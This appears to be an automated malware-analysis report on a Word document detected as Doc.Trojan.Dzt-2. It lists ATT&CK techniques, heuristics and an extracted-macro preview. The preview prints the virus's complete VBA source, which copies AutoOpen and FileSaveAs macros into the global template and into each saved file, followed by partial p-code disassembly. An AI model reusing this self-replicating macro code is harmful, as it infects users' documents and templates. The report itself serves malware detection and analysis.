MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros, specifically an AutoOpen macro and a FileSaveAs macro. The AutoOpen macro is designed to execute automatically when the document is opened, and the FileSaveAs macro appears to be involved in copying itself to a global macro storage, potentially to ensure persistence or facilitate further execution. The presence of legacy WordBasic markers and the ClamAV detection further confirm its malicious nature. The primary attack pattern involves leveraging macros to execute malicious code, likely as part of a phishing campaign.
Heuristics 4
-
ClamAV: Doc.Trojan.Dzt-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Dzt-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7166 bytes |
SHA-256: 1d7849b744b054a5231508e126ac5996183889f5329f216fe819a66753742aca |
|||
|
Detection
ClamAV:
Doc.Trojan.Dzt-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FileSaveAs"
Dim FileBaru$, FileMacro$
Dim salah
Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves a copy of the document in a separate file"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
FileBaru$ = ""
FileMacro$ = ""
salah = 0
WordBasic.DisableInput (1)
WordBasic.DisableAutoMacros (1)
On Error GoTo -1: On Error GoTo CekError
FileMacro$ = WordBasic.[MacroFileName$]()
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
FileBaru$ = WordBasic.[FileName$]()
CopyToFile
If salah <> 0 Then CopyToGlobal
Aksi
WordBasic.FileSaveAs dlg
GoTo Selesai
CekError:
If Err.Number <> 102 Then
WordBasic.FileSaveAs dlg
End If
Selesai:
End Sub
Private Sub CopyToFile()
On Error GoTo -1: On Error GoTo finish
CekCopyToFile
If salah = 0 Then
CopyAOF
End If
finish:
End Sub
Private Sub CekCopyToFile()
On Error GoTo -1: On Error GoTo fin
WordBasic.MacroCopy "Global:FileSaveAs", FileBaru$ + ":FileSaveAs", 1
fin:
salah = Err.Number
End Sub
Private Sub CopyToGlobal()
On Error GoTo -1: On Error GoTo fin
CopyAOtoG
WordBasic.MacroCopy FileMacro$ + ":FileSaveAs", "Global:FileSaveAs", 1
fin:
salah = Err.Number
End Sub
Private Sub CopyAOtoG()
On Error GoTo -1: On Error GoTo finish
WordBasic.MacroCopy FileMacro$ + ":AutoOpen", "Global:FileSave", 1
finish:
End Sub
Private Sub CopyAOF()
On Error GoTo -1: On Error GoTo finish
WordBasic.MacroCopy "Global:FileSave", FileBaru$ + ":AutoOpen", 1
finish:
End Sub
Private Sub Aksi()
On Error GoTo -1: On Error GoTo finish
WordBasic.FileSummaryInfo Comments:="DZT'96" + Chr(13) + "(c)9 April 1996 by Hikmat S/D0E94328" + Chr(13) + "comp. dept. of HFT" + Chr(13) + "Instrumentasi Elektronika" + Chr(13) + "MIPA Terapan Fakultas MIPA" + Chr(13) + "Universitas Padjadjaran" + Chr(13) + "Bandung"
finish:
End Sub
Attribute VB_Name = "NewMacros"
' Processing file: /opt/analyzer/scan_staging/6c8c508aa5cc43e1bfd84b4d071759d9.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/FileSaveAs - 4279 bytes
' Line #0:
' Line #1:
' Dim
' VarDefn FileBaru
' VarDefn FileMacro
' Line #2:
' Dim
' VarDefn salah
' Line #3:
' Line #4:
' FuncDefn (Public Sub MAIN())
' Line #5:
' LitStr 0x0000 ""
' St FileBaru$
' Line #6:
' LitStr 0x0000 ""
' St FileMacro$
' Line #7:
' LitDI2 0x0000
' St salah
' Line #8:
' LitDI2 0x0001
' Paren
' Ld WordBasic
' ArgsMemCall DisableInput 0x0001
' Line #9:
' LitDI2 0x0001
' Paren
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #10:
' OnError <crash>
' BoS 0x0000
' OnError CekError
' Line #11:
' Ld WordBasic
' ArgsMemLd [MacroFileName$] 0x0000
' St FileMacro$
' Line #12:
' Dim
' VarDefn dlg (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd FileSaveAs 0x0001
' Set dlg
' Line #13:
' Ld dlg
' Ld WordBasic
' MemLd CurValues
' ArgsMemCall FileSaveAs 0x0001
' Line #14:
' Ld dlg
' Ld WordBasic
' MemLd Dialog
' ArgsMemCall FileSaveAs 0x0001
' Line #15:
' Ld dlg
' MemLd Format$
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' LitDI2 0x0001
' Ld dlg
' MemSt Format$
' EndIf
' Line #16:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' St FileBaru$
' Line #17:
' ArgsCall CopyToFile 0x0000
' Line #18:
' Ld salah
' LitDI2 0x0000
' Ne
' If
' BoSImplicit
' ArgsCall CopyToGlobal 0x0000
' EndIf
' Line #19:
' ArgsCall Aksi 0x0000
' Line #20:
' Ld dlg
' Ld WordBasic
' ArgsMemCall FileSaveAs 0x0001
' Line #21:
' GoTo S
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.